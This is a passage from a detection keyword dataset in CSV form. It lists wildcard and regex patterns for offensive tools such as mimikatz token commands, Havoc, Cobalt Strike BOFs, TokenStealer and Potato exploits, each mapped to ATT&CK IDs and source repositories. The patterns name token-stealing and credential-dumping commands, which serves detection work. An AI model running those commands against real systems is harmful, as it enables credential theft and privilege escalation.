These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*",".{0,1000}TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*tNidhoggClient.exe*",".{0,1000}tNidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - 
T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*to $LogonPasswords*",".{0,1000}to\s\$LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*to_powershell.ducky_script*",".{0,1000}to_powershell\.ducky_script.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*toggle_privileges.cna*",".{0,1000}toggle_privileges\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*toggle_privileges_bof.*",".{0,1000}toggle_privileges_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*Toggle_Token_Privileges_BOF*",".{0,1000}Toggle_Token_Privileges_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","10","10","51","19","2021-09-14T18:50:42Z","2021-09-14T17:47:08Z" "*ToggleWDigest*",".{0,1000}ToggleWDigest.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*token find-tokens*",".{0,1000}token\sfind\-tokens.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - 
T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token impersonate *",".{0,1000}token\simpersonate\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token privs-get*",".{0,1000}token\sprivs\-get.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token privs-list*",".{0,1000}token\sprivs\-list.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token steal *",".{0,1000}token\ssteal\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 
- T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*token* -CreateProcess * -ProcessId *",".{0,1000}token.{0,1000}\s\-CreateProcess\s.{0,1000}\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*token* -ImpersonateUser -Username *",".{0,1000}token.{0,1000}\s\-ImpersonateUser\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*token::elevate*",".{0,1000}token\:\:elevate.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::list*",".{0,1000}token\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::revert*",".{0,1000}token\:\:revert.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::run*",".{0,1000}token\:\:run.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*token::whoami*",".{0,1000}token\:\:whoami.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*TokenDump.exe*",".{0,1000}TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*Token-Impersonation -Rev2Self*",".{0,1000}Token\-Impersonation\s\-Rev2Self.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Token-Impersonation -Steal*",".{0,1000}Token\-Impersonation\s\-Steal.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" 
"*Token-Impersonation.ps1*",".{0,1000}Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*TokenKidnapping.exe*",".{0,1000}TokenKidnapping\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*TokenPlayer-v0.3.exe*",".{0,1000}TokenPlayer\-v0\.3\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" 
"*TokenPlayer-v0.4.exe*",".{0,1000}TokenPlayer\-v0\.4\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.5.exe*",".{0,1000}TokenPlayer\-v0\.5\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.6.exe*",".{0,1000}TokenPlayer\-v0\.6\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.7.exe*",".{0,1000}TokenPlayer\-v0\.7\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*TokenPlayer-v0.8.exe*",".{0,1000}TokenPlayer\-v0\.8\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*tokenprivs.cpp*",".{0,1000}tokenprivs\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM 
any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*tokenprivs.exe*",".{0,1000}tokenprivs\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*TokenStealer.cpp*",".{0,1000}TokenStealer\.cpp.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealer.exe*",".{0,1000}TokenStealer\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealer.sln*",".{0,1000}TokenStealer\.sln.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealer.vcxproj*",".{0,1000}TokenStealer\.vcxproj.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" 
"*TokenStealer-master*",".{0,1000}TokenStealer\-master.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*TokenStealing.cs*",".{0,1000}TokenStealing\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*TokenStealing.exe*",".{0,1000}TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*TokenStomp.exe*",".{0,1000}TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*TokenStripBOF/src*",".{0,1000}TokenStripBOF\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" 
